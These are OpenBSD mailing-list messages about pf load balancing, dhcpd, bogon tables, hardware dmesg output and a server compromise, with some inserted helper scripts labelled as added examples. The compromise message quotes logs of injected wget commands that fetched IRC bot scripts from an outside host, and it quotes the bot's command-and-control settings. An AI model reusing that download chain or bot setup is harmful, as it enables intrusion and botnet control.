    sessions can be removed with pfctl by specifying the source and
    destination IP addresses. Since different services can run on
    different port numbers on the same machines, it should be possible to
    specify a destination port number as well.
    I guess that if a backend dies then the client is notified about
    this just as if it had been speaking directly to the backend, so it
    might not be necessary to clean out these sessions at all, and maybe
    even the tcpdrop tool will do the trick?

Anyway, the main issue is with removing single sessions from the internal
Sources table (as it is called in pfctl(8)).



/Pete




On 22. okt. 2006, at 21.13, Kevin Reay wrote:


On 10/22/06, Per-Olov Sjvholm <[EMAIL PROTECTED]> wrote:

Hi again

I am looking at the CVS. I can't see its possible to out of the  
box remove
addresses from  a round robin scheme in PF against a faulty web  
server. Am I

missing something?

But I maybe misunderstood Kevin Reay that in this thread said:  
"and it would
automatically remove the address from a pf poll (and optionality  
run a

command) when a host failed.".

Maybe I have to do some scripting after all...


It can be a little confusing at first, but it makes a lot of sense
once you understand it. The way I remember it, a person creates a
config file for slbd that defines the various pools and their polling
methods, and slbd creates the load balancing pools in pf at start-up
automatically (in an anchored ruleset). Then it removes entries from
those pools when a server goes down. So... no scripting required.

Of course, Bill Marquette will probably have more knowledge/details
about this then me...

Kevin
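
Of the two clean-up steps listed in the message above, the backend removal and the state kill are the parts a script can already do; the src-track entries are the part it cannot. As an added example, not code from the thread, here is a small sh health checker for a pool kept in a pf table. The table name <webservers>, the probe port and the use of nc(1) as the probe are assumptions.

```sh
#!/bin/sh
# Added example, not code from the thread: a cron-driven health checker for
# a pf rdr pool whose backends sit in a table (assumed here: <webservers>,
# probed on tcp/80 with nc(1)). It does the two things a script can do
# today: pull the dead backend out of the table and kill the states that
# still point at it. It deliberately leaves src-track (sticky-address)
# entries alone, because pfctl offers no per-backend way to remove them.
#
# PFCTL and NC are overridable so the logic can be exercised without root
# (e.g. PFCTL=echo NC=false sh pfhealth.sh 10.0.0.2).

PFCTL=${PFCTL:-/sbin/pfctl}
NC=${NC:-/usr/bin/nc}
TABLE=${TABLE:-webservers}
PORT=${PORT:-80}
TIMEOUT=${TIMEOUT:-2}

# backend_up HOST: true if HOST accepts a TCP connection on $PORT in time.
backend_up() {
    "$NC" -z -w "$TIMEOUT" "$1" "$PORT" >/dev/null 2>&1
}

# evict_backend HOST: drop HOST from the rdr table, then kill every state
# whose destination is HOST (first -k: any source, second -k: the backend).
evict_backend() {
    "$PFCTL" -t "$TABLE" -T delete "$1" &&
    "$PFCTL" -k 0.0.0.0/0 -k "$1"
}

# restore_backend HOST: put a recovered backend back into rotation.
# (-T add of an address already in the table is harmless.)
restore_backend() {
    "$PFCTL" -t "$TABLE" -T add "$1"
}

# check_pool HOST...: probe every backend and reconcile the table.
# Prints "HOST up" or "HOST down" per backend so cron mail shows decisions.
check_pool() {
    for h in "$@"; do
        if backend_up "$h"; then
            restore_backend "$h" >/dev/null 2>&1
            echo "$h up"
        else
            evict_backend "$h" >/dev/null 2>&1
            echo "$h down"
        fi
    done
}

if [ $# -gt 0 ]; then
    check_pool "$@"
fi
```

Run it from root's crontab every minute with the backend addresses as arguments. Note what it does not fix: a client that already has a sticky-address entry for the evicted backend keeps being mapped to it until that src-track entry expires, which is exactly the gap described above.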




Re: pf load balancing and failover

2006-10-26 Thread Pete Vickers

Hi Per-Olav,

If you are dealing with http based services, rather than generic tcp,  
then you could take a look at 'pound'. I did a port of it a while  
back, and use it in pretty large scale environment here, it supports  
sticky backend etc. Works well for me, YMMV.


http://marc.theaimsgroup.com/?l=openbsd-ports&m=115513682623098

/Pete


On 26. okt. 2006, at 23.26, Per-Olov Sjvholm wrote:


On Thursday 26 October 2006 22:28, Kevin Reay wrote:

Hey,

On 10/26/06, Pete Vickers <[EMAIL PROTECTED]> wrote:

If I recall correctly,


You don't. :o)


slbd adds new rules to pf for each incoming
tcp session. Since I couldn't get it to work (old version) I do not
know what the session and Sources tables will look like, but I
suspect there will be no problems with them in slbd. Client-server
association is maintained by slbd and implemented with separate  
rules

for each tcp session.


slbd doesn't maintain separate rules for each tcp session. Client- 
server

association is NOT maintained by slbd.


This seems a bit ineffective and rather pointless since pf has the
load balancing functionality built in.


Which slbd relies on. Slbd just inserts the load balancing rules into
pf based on it's own config. Then it does the job of health-checking
the servers listed in it's config file, and removing them from the
server list if they go down.

The problems with using pf and a health checking script is  
related to

removal of failed backends. There are two separate issues:

  1) When using sticky-address in the rdr rules client-server
 associations are added to the internal Sources table.
 It is impossible to remove entries for a single backend from  
this
 table. If a backend fails and is removed from the rdr  
destination
 table this table will have to be flushed, making all clients  
end

up on
 new backends, which is unacceptable in many configurations.
 If this table is not cleared then the rdr destination table  
is not
 inspected for client IP's found in the Sources table. These  
clients

 will still be sent to the failed and removed backend.
 Preferably entries could be removed from this table based on
 source-IP and backend-IP:backend-port, and maybe even the  
virtual

 service IP:port or a pf rule number.


Which is what slbd avoids. slbd doesn't use sticky-address for  
this reason.

slbd seems mostly geared for web servers where the web application
is written well enough to not need each request to go back to the  
same

server.

Kevin


Hi Kevin

I can come up with 100 reasons for using the same web target server  
over a
whole session and very few for not doing it. Can't see we can use  
slbd for
the ordering system as intended if requests goes to just any server  
in the

pool.

Or did I miss anything?

Regards
/Per-Olov




Re: pf load balancing and failover

2006-10-27 Thread Pete Vickers

Hi Berk,

I'm really interested in this. I have a load of legacy tcp session
based load balancing which I'd love to migrate to an OpenBSD/pf based
solution. Do you have a patch which applies cleanly to 4.0?


/Pete


On 26. okt. 2006, at 22.16, Berk D. Demir wrote:


Pete Vickers wrote:

 1) When using sticky-address in the rdr rules client-server
associations are added to the internal Sources table.
It is impossible to remove entries for a single backend from this
table. If a backend fails and is removed from the rdr destination
table this table will have to be flushed, making all clients  
end up on

new backends, which is unacceptable in many configurations.
If this table is not cleared then the rdr destination table is  
not
inspected for client IP's found in the Sources table. These  
clients

will still be sent to the failed and removed backend.
Preferably entries could be removed from this table based on
source-IP and backend-IP:backend-port, and maybe even the virtual
service IP:port or a pf rule number.
 2) TCP sessions to a failed backend will continue to exist after the
backend is removed from the rdr destination table. As of today  
these

sessions can be removed with pfctl by specifying the source and
destination IP addresses. Since different services can run on
different port numbers on the same machines it should be
possible to

specify a destination port number as well.
I guess that if a backend dies then the client is notified  
about this
just as if it had been speaking directly to the backend, so it  
might
not be necessary to clean out these sessions at all, and maybe  
even

the tcpdrop tool will do the trick?
Anyway, main issue is with removing single sessions from the  
internal Sources table (as it is called in pfctl(8)).


I've submitted a patch, adding a new ioctl to pf and an  
implementation to clear src-track entries likewise states  (-k  
1.1.1.1 -k 2.3.5.0/23).


A patched build (smt. between 4.0 and -current) is running in many  
DCs in my county right now.


pfctl.c changed after my submission. I have to fix the patches and  
post here in case it helps.


It needs to get OKs from developers to get into the tree. Last  
touch with a developer about this patch was with dhartmei on Jul 25.


(I'll post it tomorrow)




Re: bridge(4) RSTP

2006-10-27 Thread Pete Vickers

Hi,

A nice start could be to teach our tcpdump about RSTP. At present it  
just pukes:


20:30:14.196199 802.1d unknown protocol ver(0x2)

/Pete



On 27. okt. 2006, at 13.35, Stuart Henderson wrote:


FreeBSD have early support for rapid STP in bridge(4):

http://lists.freebsd.org/pipermail/freebsd-current/2006-October/066535.html

http://people.freebsd.org/~thompsa/bridge_rstp.20061012.diff

I'll try and look at it sometime, but knowing how far I got last time
I tried porting any kernel code (not very...and they have made quite a
few changes to bridge(4) since importing it via NetBSD last year)
I thought it may be worth drawing attention to here in case anyone
else is interested.




Re: bridge(4) RSTP

2006-10-30 Thread Pete Vickers

Hi,

Patch applies cleanly and appears to work great:

[EMAIL PROTECTED] ~> tcpdump -i bge1 stp
tcpdump: listening on bge1, link-type EN10MB
15:25:02.061139 802.1d RSTP config flags=0x3c root=6011.0:18:74:61:e5:40 rootcost=0x0 bridge=6011.0:18:74:61:e5:40 port=0x8630 age=0/0 max=20/0 hello=2/0 fwdelay=15/0


I'm no coder either so I can't review your patch's quality, but it
would be good to get it verified & in the tree.


thanks.

/Pete




On 29. okt. 2006, at 14.15, Stuart Henderson wrote:


On 2006/10/27 14:03, Pete Vickers wrote:

A nice start could be to teach our tcpdump about RSTP. At present it
just pukes:


something like this? (coding style probably sucks, but I'm no coder :)

Index: print-stp.c
===
RCS file: /data/cvsroot/OpenBSD/src/usr.sbin/tcpdump/print-stp.c,v
retrieving revision 1.4
diff -u -r1.4 print-stp.c




subversion with mod_dav_svn

2006-10-31 Thread Pete Vickers

Hi,

Anybody got subversion running well under OpenBSD with the http/
webdav transport? It seems to require apache2 amongst a whole shed
load of other dependencies. Google throws up nothing less than 4
years old, so I'm really just after any experiences to shortcut my legwork.


thanks

/Pete



Re: PCI-X not seen by 3.8 on HP DL-145 G2

2005-12-09 Thread Pete Vickers

On 9. des. 2005, at 10.01, Srebrenko Sehic wrote:




2) DL145 (G2), SATA/nForce4 = works, but the disk is slow and the CPU
spends 100% of time in kernel with heavy disk activity. (tested on
i386/3.8-STABLE)




for my DL145 (pretty new) I get a reasonable-ish disk I/O of ~60Mb/s  
( with CPU at 99% idle)


[EMAIL PROTECTED] /root> dd if=/dev/rwd0a of=/dev/null bs=1m count=1000
1000+0 records in
1000+0 records out
1048576000 bytes transferred in 17.645 secs (59423434 bytes/sec)
[EMAIL PROTECTED] /root>

... since it's a  2xAMD64 CPU box I'm running amd64 GENERIC.MP (- 
current), the only problem I experienced was crashing on boot with  
ipmi. once that was disabled, all is fine)


(you wouldn't believe how fast this thing chews through the key gen  
on first boot :-)



[EMAIL PROTECTED] /root> cat /var/run/dmesg.boot
OpenBSD 3.8-current (GENERIC.MP) #0: Wed Nov 30 01:23:39 CET 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/amd64/compile/GENERIC.MP
real mem = 2146140160 (2095840K)
avail mem = 1835208704 (1792196K)
using 22937 buffers containing 214822912 bytes (209788K) of memory
mainbus0 (root)
ipmi at mainbus0 not configured
mainbus0: Intel MP Specification (Version 1.4) (AMD  HAMMER  )
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: AMD Opteron(tm) Processor 252, 2612.35 MHz
cpu0:  
FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW
cpu0: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB  
64b/line 16-way L2 cache
cpu0: ITLB 32 4KB entries fully associative, 8 4MB entries fully  
associative
cpu0: DTLB 32 4KB entries fully associative, 8 4MB entries fully  
associative

cpu0: apic clock running at 200925952Hz
cpu1 at mainbus0: apid 1 (application processor)
cpu1: AMD Opteron(tm) Processor 252, 2612.04 MHz
cpu1:  
FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,NXE,MMXX,FFXSR,LONG,3DNOW2,3DNOW
cpu1: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 1MB  
64b/line 16-way L2 cache
cpu1: ITLB 32 4KB entries fully associative, 8 4MB entries fully  
associative
cpu1: DTLB 32 4KB entries fully associative, 8 4MB entries fully  
associative

mpbios: bus 0 is type PCI
mpbios: bus 1 is type PCI
mpbios: bus 2 is type PCI
mpbios: bus 3 is type PCI
mpbios: bus 4 is type PCI
mpbios: bus 128 is type PCI
mpbios: bus 129 is type PCI
mpbios: bus 134 is type PCI
mpbios: bus 139 is type ISA
ioapic0 at mainbus0 apid 2: pa 0x8373cf24, version 11, 24 pins
ioapic1 at mainbus0 apid 3: pa 0x8373ce24, version 11, 7 pins
ioapic2 at mainbus0 apid 4: pa 0x8373cc24, version 11, 7 pins
pci0 at mainbus0 bus 0: configuration mode 1
"Nvidia nForce4 DDR" rev 0xa3 at pci0 dev 0 function 0 not configured
pcib0 at pci0 dev 1 function 0 "Nvidia nForce4 ISA" rev 0xa3
"Nvidia nForce4 SMBus" rev 0xa2 at pci0 dev 1 function 1 not configured
ohci0 at pci0 dev 2 function 0 "Nvidia nForce4 USB" rev 0xa2: apic 2  
int 10 (irq 10), version 1.0, legacy support

usb0 at ohci0: USB revision 1.0
uhub0 at usb0
uhub0: Nvidia OHCI root hub, rev 1.00/1.00, addr 1
uhub0: 4 ports with 4 removable, self powered
ehci0 at pci0 dev 2 function 1 "Nvidia nForce4 USB" rev 0xa3: apic 2 int 11 (irq 11)
ehci0: timed out waiting for BIOS
usb1 at ehci0: USB revision 2.0
uhub1 at usb1
uhub1: Nvidia EHCI root hub, rev 2.00/1.00, addr 1
uhub1: 4 ports with 4 removable, self powered
pciide0 at pci0 dev 6 function 0 "Nvidia nForce4 IDE" rev 0xa2: DMA, channel 0 configured to compatibility, channel 1 configured to compatibility
pciide0: channel 0 disabled (no drives)
pciide0: channel 1 disabled (no drives)
pciide1 at pci0 dev 8 function 0 "Nvidia nForce4 SATA 2" rev 0xa3: DMA
pciide1: using apic 2 int 10 (irq 10) for native-PCI interrupt
wd0 at pciide1 channel 0 drive 0: 
wd0: 16-sector PIO, LBA48, 76319MB, 156301488 sectors
wd0(pciide1:0:0): using PIO mode 4, Ultra-DMA mode 5
wd1 at pciide1 channel 1 drive 0: 
wd1: 16-sector PIO, LBA48, 238475MB, 488397168 sectors
wd1(pciide1:1:0): using PIO mode 4, Ultra-DMA mode 5
ppb0 at pci0 dev 9 function 0 "Nvidia nForce4 PCI-PCI" rev 0xa2
pci1 at ppb0 bus 1
vga1 at pci1 dev 5 function 0 "Nvidia GeForce2 MX" rev 0xb2
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
ppb1 at pci0 dev 12 function 0 "Nvidia nForce4 PCIE" rev 0xa3
pci2 at ppb1 bus 2
bge0 at pci2 dev 0 function 0 "Broadcom BCM5721" rev 0x11, BCM5750 B1 (0x4101): apic 2 int 11 (irq 11), address 00:15:60:5f:93:49
brgphy0 at bge0 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0
ppb2 at pci0 dev 13 function 0 "Nvidia nForce4 PCIE" rev 0xa3
pci3 at ppb2 bus 3
bge1 at pci3 dev 0 function 0 "Broadcom BCM5721" rev 0x11, BCM5750 B1 (0x4101): apic 2 int 10 (irq 10), address 00:15:60:5f:93:48
brgphy1 at bge1 phy 1: BCM5750 10/100/1000baseT PHY, rev. 0
ppb3 at pci0 dev 14 function 0 "Nvidia nForce4 PCIE" rev 0xa3
pci4 at ppb3 bu

Re: PCI-X not seen by 3.8 on HP DL-145 G2

2005-12-09 Thread Pete Vickers

On 9. des. 2005, at 11.33, Srebrenko Sehic wrote:


On 12/9/05, Pete Vickers <[EMAIL PROTECTED]> wrote:


for my DL145 (pretty new) I get a reasonable-ish disk I/O of ~60Mb/s
( with CPU at 99% idle)

[EMAIL PROTECTED] /root> dd if=/dev/rwd0a of=/dev/null bs=1m count=1000
1000+0 records in
1000+0 records out
1048576000 bytes transferred in 17.645 secs (59423434 bytes/sec)
[EMAIL PROTECTED] /root>


Try testing read/write into files instead of raw device. Also, try
with smaller block sizes. I bet you will see different results.



yeah, this is pretty poor but consistent ( but cpu use is still negligible):


[EMAIL PROTECTED] /tmp> dd if=/dev/zero of=junk.data bs=1m count=500
500+0 records in
500+0 records out
524288000 bytes transferred in 68.774 secs (7623327 bytes/sec)
[EMAIL PROTECTED] /tmp>

[EMAIL PROTECTED] /tmp> dd if=/dev/zero of=junk.data bs=512k count=1000
1000+0 records in
1000+0 records out
524288000 bytes transferred in 68.576 secs (7645311 bytes/sec)
[EMAIL PROTECTED] /tmp>



LSI 300-8x problems

2005-12-09 Thread Pete Bristow

Hi all,

Having read the list archives, the decision was made to get a 300-8x for
a new server I'm putting together. 


However, I'm having 2 distinct problems. First of all, the card is only
detected when pcibios is disabled. The second being that during the
installation process, the disklabels are written, but the install then
"hangs" just after asking for confirmation to delete all data on the
partitions. If left for a while, "ami0: timeout ccb 126" is printed several
times. This has been tried both with the original firmware (LSI_FW_813F)
and with the latest firmware (LSI_FW_813J). 


There is a slew of dmesgs available (see the links below); with the new
and old firmware, and with and without pcibios enabled. The motherboard is
an Intel 925 chipset part.

Motherboard information: 
http://www.intel.com/design/servers/boards/SE7221BK1-E/index.htm

Dmesgs: http://midworld.co.uk/~dmesg/

Basically, has anyone got any ideas of how to get this thing working?

Thanks for any help

Pete



Re: dhcpd and static entries

2005-12-12 Thread Pete Vickers

On 12. des. 2005, at 21.22, Peter Hessler wrote:


This is with -current dhcpd within the last month.

On Mon, 12 Dec 2005 12:15:37 -0800
Peter Hessler <[EMAIL PROTECTED]> wrote:

: I have a dhcp'd network, with static entries for a ton of machines.
: The problem is that the range is for .10 - .254, and the static
: entries are scattered throughout.  When a random client requests an
: address, dhcpd will give out a statically defined entry.  So when the
: static entry machine comes back, the two machines fight each other
: for the address.
:
: Moving the static entries to outside the range is unfeasible right
: now.  And it doesn't address the issue of 'machine was on a different
: dhcp network with an address that happens to be statically defined on
: ours'.
:
: Why does dhcpd give out addresses that are currently in use, and why
: does it give out statically defined addresses?  Shouldn't it remove the
: static entries from the dynamic pool?
:
:
: Sanitized portions of config:
:
: shared-network LOCAL-NET {
: option  domain-name "example.com";
: option  domain-name-servers 10.0.0.1;
:
: option  nis-domain "example.nis";
: option  nis-servers nis.example.com;
: option  ntp-servers ntp.example.com;
: option  time-offset -28800; # PST
:
: subnet 10.0.0.0 netmask 255.255.255.0 {
: option routers 10.0.0.1;
:
: range 10.0.0.10 10.0.0.254;
: }
:
: group {
:   use-host-decl-names on;
:  # host1.example.com 10.0.0.15
:host host1.example.com { hardware ethernet \
:  00:0f:1f:f7:7d:64; fixed-address host1.example.com; }
:  # host2.example.com 10.0.0.20
:   host host2.example.com { hardware ethernet \
:  02:A0:98:01:F5:B4; fixed-address host2.example.com; }
:  # host3.example.com 10.0.0.29
:   host host3.example.com { hardware ethernet \
:  00:0F:1F:F7:78:B6; fixed-address host3.example.com; }
:}
: }
:



I believe OpenBSD's dhcpd is based on ISC's implementation, in which case: static entries are in the global scope and independent of any pool declaration. The error is one of configuration: you've defined static entries and a dynamic pool overlapping = you've told it to use the IP addresses twice.
At a pinch, the option ping-check might help you out if your address space utilisation is not too large.


/Pete
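The overlap Pete describes can be checked mechanically before dhcpd is restarted. The following is an added example, not part of the thread and not dhcpd's own code: a small sh/awk script that reads an ISC-style dhcpd.conf, collects every `range` line and every host's `fixed-address`, and reports hosts whose address lies inside a declared range. It assumes fixed-address values are literal IPv4 addresses (Peter's config uses hostnames, which would have to be resolved first); the sample config at the bottom is constructed in the shape of the one quoted above.

```shell
#!/bin/sh
# Added example (not from the thread, not part of dhcpd): list fixed-address
# hosts that sit inside a dynamic "range" in an ISC-style dhcpd.conf.
# Assumes fixed-address values are literal IPv4 addresses.

# dhcp_overlaps FILE
# Prints "HOST ADDRESS RANGE_START RANGE_END" for each overlapping host,
# sorted, so the output is stable enough to diff or alert on.
dhcp_overlaps() {
    awk '
        # dotted quad -> integer, so addresses can be compared numerically
        function ip2n(ip,    o) {
            split(ip, o, ".")
            return ((o[1] * 256 + o[2]) * 256 + o[3]) * 256 + o[4]
        }
        # "range 10.0.0.10 10.0.0.254;" -> remember the bounds
        /^[ \t]*range[ \t]/ {
            gsub(";", "")
            nr++; rs[nr] = $2; re[nr] = $3
        }
        # "host NAME {" opens a host declaration; this rule sits before the
        # fixed-address rule because both may be on the same line
        /^[ \t]*host[ \t]/ { h = $2 }
        # "fixed-address 10.0.0.15;" belongs to the current host declaration
        /fixed-address[ \t]/ {
            for (i = 1; i <= NF; i++)
                if ($i == "fixed-address") { a = $(i + 1); break }
            gsub("[;}]", "", a)
            if (a ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) fa[h] = a
        }
        END {
            for (h in fa)
                for (i = 1; i <= nr; i++)
                    if (ip2n(fa[h]) >= ip2n(rs[i]) && ip2n(fa[h]) <= ip2n(re[i]))
                        print h, fa[h], rs[i], re[i]
        }
    ' "$1" | sort
}

# Constructed sample config in the shape of the one quoted in the thread.
sample_dhcpd_conf() {
    cat <<'EOF'
shared-network LOCAL-NET {
    subnet 10.0.0.0 netmask 255.255.255.0 {
        option routers 10.0.0.1;
        range 10.0.0.10 10.0.0.254;
    }
    group {
        use-host-decl-names on;
        host host1.example.com { hardware ethernet 00:0f:1f:f7:7d:64; fixed-address 10.0.0.15; }
        host host2.example.com { hardware ethernet 02:a0:98:01:f5:b4; \
            fixed-address 10.0.0.20; }
        host printer.example.com { hardware ethernet 00:0f:1f:f7:78:b6; fixed-address 10.0.0.5; }
    }
}
EOF
}

conf=$(mktemp) || exit 1
sample_dhcpd_conf > "$conf"
dhcp_overlaps "$conf"     # host1 and host2 overlap the range, the printer does not
rm -f "$conf"
```

Hostnames used as fixed-address values are skipped, so resolve them (or keep the IP in a comment, as Peter did) before trusting an empty result.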



Re: Just confirming: no way to do a pf rdr based on hostname?

2005-12-12 Thread Pete Vickers

On 12. des. 2005, at 22.44, Peter Landry wrote:


Hi All,
We're migrating an old Microsoft ISA Server system to OpenBSD pf. First
off, before I ask any questions, kudos to everyone -- Installing OpenBSD

3.8 was a very pleasant, painless experience for someone who's never
used it before. Setting up pf/nat was also extraordinarily easy. The
docs are great.

That aside, the only thing that I haven't been able to migrate yet is
ISA's ability to redirect web requests coming in on the same IP to
different machines based on the host name. IE- www.a.com (IP
123.123.0.1) gets redirected to the internal IP 192.168.0.1 while
www.b.com (also IP 123.123.0.1) gets redirected to the internal IP
192.168.0.2.

I haven't found anything in the docs, and all the list archive questions
I've found were specific to ipnat, not pf.

I'm thinking that I can't do it. In that case, my options seem to be 1)
use different external IP's for each website, and redirect to different
internal servers based on IP 2) redirect all web traffic to the legacy
ISA system, which will then redirect based on hostname. I'm hesitant to
use up all our IPs for option 1, but I'm thinking option 2 is even
worse... Are there any options I haven't thought of?

Thanks for any advice...
Peter L.



You need to examine the application layer for 'routing' such http requests; I'd take a look at reverse proxying with either apache (in the base system) or squid in the packages. Either of those should be able to listen on your firewall's external interface, and forward http requests inbound based on HTTP/1.1 hostnames within the requests.


/Pete



Re: pf question

2005-12-29 Thread Pete Vickers
Better (IMHO) to use bgpd to suck down the 'bogon' prefixes, and then tag them for pf, see example here:


http://www.cymru.com/BGP/bogon-rs.html

/Pete


On 29. des. 2005, at 18.32, eric wrote:


On Thu, 2005-12-29 at 11:38:22 -0500, Dave Feustel proclaimed...


Has anyone on the list experience with using pf to
block ip addresses in the iana reserved ip address ranges list?


I don't think any of us have ever thought of that.

Oh wait..I may have... run this out of cron weekly

#!/bin/sh
#; $Id: gbogl.sh,v 1.3 2005/01/28 04:47:16 epancer Exp $
#; a small tool to grab bogon list from team cymru
#;

PATH="/usr/bin:/bin:/usr/sbin:/sbin"
BOGONFILE="/etc/bogon.txt"
BOGONURL="http://www.cymru.com/Documents/bogon-bn-nonagg.txt"

checkfile () {
 if [ ! -f $BOGONFILE ]; then
  echo "! $BOGONFILE must exist, exiting."
  exit 2
 fi
}

getnewfile () {
lynx -dump $BOGONURL > $BOGONFILE
}

fixperm () {
chmod 644 $BOGONFILE
}

logmsg () {
logger -p kern.notice "rewrote $BOGONFILE"
}

checkfile
getnewfile
fixperm
logmsg

exit 0


Then...

table  persist file "/etc/bogon.txt"

Somewhere in your pf.conf.
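eric's script writes the download straight over /etc/bogon.txt, so a failed or truncated fetch (an HTML error page, an empty file) leaves a bogus list that the next pf.conf load pulls in without complaint. The following is an added example, not eric's script and not anything from Team Cymru: it fetches to a temporary file, checks that the content is a list of IPv4 prefixes, and only then installs it and reloads the table with pfctl. The table name `bogons` and the use of OpenBSD's ftp(1) for the HTTP fetch are assumptions; the sample list in the self-check is constructed.

```shell
#!/bin/sh
# Added example, not eric's script: refresh a pf bogon table without ever
# leaving it empty.  The list is fetched to a temporary file, checked to be
# a plausible list of IPv4 prefixes, and only then moved into place and
# loaded with pfctl.  Assumed names: pf.conf declares
# "table <bogons> persist file /etc/bogon.txt"; OpenBSD ftp(1) does the fetch.
PATH="/usr/bin:/bin:/usr/sbin:/sbin"
BOGONFILE="${BOGONFILE:-/etc/bogon.txt}"
BOGONURL="${BOGONURL:-http://www.cymru.com/Documents/bogon-bn-nonagg.txt}"
TABLE="${TABLE:-bogons}"

# valid_prefix_list FILE
# Succeeds only if every non-blank, non-comment line is A.B.C.D/N with
# octets 0-255 and N 0-32, and there is at least one such line.  An HTML
# error page or an empty download therefore never reaches pf.
valid_prefix_list() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        {
            if (NF != 1 || split($1, p, "/") != 2) { bad++; next }
            if (p[2] !~ /^[0-9]+$/ || p[2] > 32) { bad++; next }
            if (split(p[1], o, ".") != 4) { bad++; next }
            for (i = 1; i <= 4; i++)
                if (o[i] !~ /^[0-9]+$/ || o[i] > 255) { bad++; next }
            good++
        }
        END { exit !(good > 0 && bad == 0) }
    ' "$1"
}

# refresh_bogons
# Fetch, validate, install and reload; on any failure the old file and the
# loaded table are left untouched and the reason goes to syslog.
refresh_bogons() {
    tmp=$(mktemp "$(dirname "$BOGONFILE")/bogon.XXXXXXXXXX") || return 1
    if ! ftp -o "$tmp" "$BOGONURL"; then
        logger -p kern.warning "bogon fetch failed, keeping $BOGONFILE"
        rm -f "$tmp"; return 1
    fi
    if ! valid_prefix_list "$tmp"; then
        logger -p kern.warning "bogon list failed validation, keeping $BOGONFILE"
        rm -f "$tmp"; return 1
    fi
    chmod 644 "$tmp" && mv "$tmp" "$BOGONFILE" || { rm -f "$tmp"; return 1; }
    pfctl -t "$TABLE" -T replace -f "$BOGONFILE" || return 1
    logger -p kern.notice "rewrote $BOGONFILE and reloaded table <$TABLE>"
}

# "sh bogon-refresh.sh refresh" is what cron would run; with no argument the
# script only exercises the validator on a constructed sample.
case "${1:-}" in
refresh)
    refresh_bogons ;;
*)
    demo=$(mktemp) || exit 1
    printf '# constructed sample, not a real bogon list\n10.0.0.0/8\n192.0.2.0/24\n' > "$demo"
    valid_prefix_list "$demo" && echo "sample list is well-formed"
    rm -f "$demo" ;;
esac
```

The Cymru file carries `#` comment lines, which pf's table file format accepts, so they are passed through rather than stripped; the `-T replace` step is what eric's version lacks, since a `persist file` table is otherwise only re-read when pf.conf is loaded.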




Re: How did they get here?

2006-01-04 Thread Pete Vickers

Hi,


Standard advice is to reinstall the o/s (3.8 ? ;-) and then _data_ only from a known good backup. You could use a boot cdrom & dd off an image of the disk for later analysis first if you want.


Is there some attack vector like php or such available on the machine ? maybe they used that to retrieve & write the file ? ... but access to /tmp is tricky from a chrooted httpd !



/Pete



On 4. jan. 2006, at 15.50, Gaby vanhegan wrote:


To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173
i386.

I have some suspect files in /tmp, and I'm fairly sure that they
shouldn't be there.  Only thing I can't twig is what method the
attackers used to get the files into that directory.  The files are:

### Microsoft Search Worm - by br0k3d
###
   # From the same author of LinuxDay Worm and
other variants  ###

And:

#  ShellBOT
#  0ldW0lf - [EMAIL PROTECTED]
#  - www.atrix-br.cjb.net
#  - www.atrix.cjb.net

in /tmp/.cpanel and /tmp/.cpanel.tmp.  Reading them through, they
just look like IRC clients written in Perl that have some remote
commands for DOS, and the likes.  They connect to a chatroom and
print some message or other.  If anybody wants to have some fun, the
main config block is:

# IRC
my @adms=("darkwoot", "br0k3d", "vipzen", "Nandokabala");   #nick dos
administradores
my @canais=("#gestapo");
my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso..
vai aparece com um numero radonamico no final
my $ircname = 'SSSA';
chop (my $realname = `uname -a`);
$servidor='irc.agitamanaus.net' unless $servidor;   #servidor d irc q
vai c usadu c naum for especificado no argumento
my $porta='6667';   #porta do servidor d irc

My question is how did these files get into the machine.  I have
entries in the httpd error log that look like this:

--05:10:47--  http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
=> `/tmp/.cpanel'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
HTTP request sent, awaiting response... --05:10:57--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
=> `/tmp/.cpanel.tmp'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed:
Connection timed out.
Retrying.

--05:12:13--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
   (try: 2) => `/tmp/.cpanel.tmp'
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
Length: 3,355 [text/plain]

 0K ...   100% 468.05 KB/s

05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]

So something is clearly injecting a command into a script, and it is
causing wget to run and fetch some files.  There are more instances
of the same thing, but they're all fetching a file from the same
place (either .cpanel, .cpanel.tmp or .plesk).

Because they're in the default Apache error log, the attacker must
have hit a website on the machine that doesn't have an ErrorLog
defined, or they hit the machine by IP instead of a hostname.  I got
a list of sites that have no error log (and would log to
/var/www/logs/error_log) and checked their transfer logs.  None of them had
any entries in them that correspond to any of the times on the wget
entries, so I learn nothing from this.  There are earlier entries as
well, doing the same thing, but to a different site.

I'm going to do a bulk grep on all the web server logs to see if
anything about wget turns up in any of them, and if I can then work
out which script on which site is causing the problem.  As far as I
can tell, there is no damage, but there are some entries like these
in the error logs:

/tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A<80><80>^44: not found
/tmp/x44423[2]: 1?X<89>?<8D>T<81>^DP<83>??RQ??^A?: not found
/tmp/x44423[4]: syntax error: `(' unexpected

Am I right in thinking that these entries show somebody trying to run
a Linux binary unsuccessfully?  Good job I leave Linux emulation
turned off... :)

So, what's my next move?  My daily/weekly security emails show
